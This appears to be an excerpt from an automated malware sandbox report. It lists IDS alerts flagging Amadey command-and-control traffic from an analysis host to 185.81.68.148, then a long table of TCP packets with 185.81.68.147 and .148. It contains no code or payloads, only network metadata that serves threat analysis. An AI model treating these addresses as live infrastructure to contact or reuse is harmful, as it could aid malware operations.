2024-12-13T07:48:34.644011+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49882	185.81.68.148	80	TCP
2024-12-13T07:48:40.970501+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49900	185.81.68.148	80	TCP
2024-12-13T07:48:47.051052+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49920	185.81.68.148	80	TCP
2024-12-13T07:48:53.239614+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49938	185.81.68.148	80	TCP
2024-12-13T07:48:59.678631+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49953	185.81.68.148	80	TCP
2024-12-13T07:49:05.786107+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49970	185.81.68.148	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 07:47:04.366941929 CET	49736	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:04.367295027 CET	49737	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:04.395368099 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:04.488801956 CET	80	49736	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:04.488853931 CET	80	49737	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:04.488895893 CET	49736	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:04.489064932 CET	49737	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:04.489165068 CET	49737	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:04.489203930 CET	49736	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:04.517766953 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:04.517847061 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:04.517991066 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:04.608918905 CET	80	49737	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:04.610160112 CET	80	49736	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:04.637940884 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:05.823302984 CET	80	49737	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:05.824867964 CET	49737	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:05.831722021 CET	80	49736	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:05.831787109 CET	49736	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:05.846211910 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:05.846245050 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:05.846383095 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:05.846417904 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:05.846453905 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:05.846457958 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:05.846483946 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:05.846483946 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:05.846489906 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:05.846512079 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:05.846610069 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:05.846741915 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:05.846777916 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:05.846832037 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:05.846945047 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:05.846980095 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:05.846991062 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:05.847037077 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:05.966497898 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:05.966566086 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:05.966583967 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:05.966625929 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:05.970603943 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:05.970665932 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.037139893 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.037283897 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.037332058 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.037404060 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.041260004 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.041328907 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.041373968 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.041429996 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.049649954 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.049710989 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.049773932 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.049830914 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.058043957 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.058103085 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.058195114 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.058250904 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.066503048 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.066581011 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.066615105 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.066684961 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.074922085 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.075033903 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.075033903 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.075089931 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.083266020 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.083343029 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.083379030 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.083441019 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.091639996 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.091701984 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.091763020 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.091824055 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.100049973 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.100157976 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.100169897 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.100209951 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.108542919 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.108607054 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.108686924 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.108743906 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.116466045 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.116581917 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.116651058 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.229074955 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.229116917 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.229163885 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.229197979 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.231401920 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.231460094 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.231515884 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.231573105 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.236097097 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.236161947 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.236202002 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.236258030 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.240783930 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.240849972 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.240948915 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.241003990 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.245584011 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.245639086 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.245646954 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.245687962 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.250099897 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.250170946 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.250221968 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.250277042 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.254741907 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.254848003 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.254885912 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.254905939 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.259397984 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.259460926 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.259511948 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.259567022 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.264069080 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.264172077 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.264175892 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.264224052 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.268695116 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.268759012 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.268821001 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.268879890 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.273456097 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.273515940 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.273569107 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.273622036 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.277991056 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.278057098 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.278081894 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.278136015 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.282588959 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.282651901 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.282710075 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.282766104 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.287278891 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.287344933 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.287389994 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.287442923 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.291929007 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.291995049 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.292028904 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.292081118 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.296591997 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.296690941 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.296705961 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.296744108 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.301177979 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.301244974 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.301300049 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.301354885 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.305871964 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.305938005 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.305954933 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.306008101 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.310508013 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.310611963 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.310651064 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.310671091 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.315125942 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.315201044 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.315231085 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.315284014 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.319730997 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.319797993 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.421108007 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.421152115 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.421228886 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.421228886 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.422086954 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.422161102 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.422298908 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.422367096 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.426048040 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.426105022 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.426162958 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.426162958 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.429999113 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.430064917 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.430130959 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.430202961 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.433837891 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.433902979 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.433916092 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.433978081 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.437452078 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.437521935 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.437568903 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.437633038 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.441139936 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.441199064 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.441258907 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.441314936 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.444770098 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.444930077 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.444977999 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.445044041 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.448198080 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.448311090 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.448354959 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.448354959 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.451664925 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.451791048 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.451837063 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.451838017 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.455178022 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.455233097 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.455277920 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.455277920 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.458596945 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.458713055 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.458755016 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.458812952 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.462105989 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.462172985 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.462235928 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.462294102 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.465620041 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.465675116 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.467335939 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.467335939 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.469022989 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.469125032 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.469145060 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.469181061 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.472498894 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.472604990 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.475339890 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.475339890 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.475967884 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.476035118 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.476090908 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.476166964 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.479482889 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.479582071 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.479607105 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.479635000 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.482906103 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.483119011 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.483128071 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.483185053 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.486428022 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.486464024 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.487340927 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.487340927 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.489850998 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.489950895 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.489965916 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.490037918 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.493344069 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.493468046 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.493483067 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.493560076 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.496845961 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.496901989 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.496917009 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.496948957 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.500282049 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.500380993 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.500401020 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.500436068 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.503735065 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.503814936 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.503866911 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.505342007 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.507242918 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.507277966 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.507339954 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.507339954 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.510670900 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.510730028 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.511217117 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.511307955 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.514139891 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.514251947 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.514276981 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.514301062 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.517740965 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.517802954 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.517870903 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.517941952 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.521094084 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.521151066 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.521162033 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.521234989 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.613078117 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.613166094 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.614128113 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.614128113 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.614366055 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.614500046 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.614620924 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.614620924 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.616638899 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.616738081 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.616785049 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.616785049 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.619462013 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.619515896 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.619586945 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.619586945 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.622200966 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.622296095 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.622319937 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.622345924 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.624967098 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.625020027 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.625026941 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.625349045 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.627660990 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.627787113 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.627871037 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.627871037 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.630362034 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.630415916 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.631331921 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.632960081 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.633022070 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.633063078 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.633136034 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.635466099 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.635586977 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.635648966 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.635648966 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.637994051 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.638048887 CET	49738	80	192.168.2.4	185.81.68.147
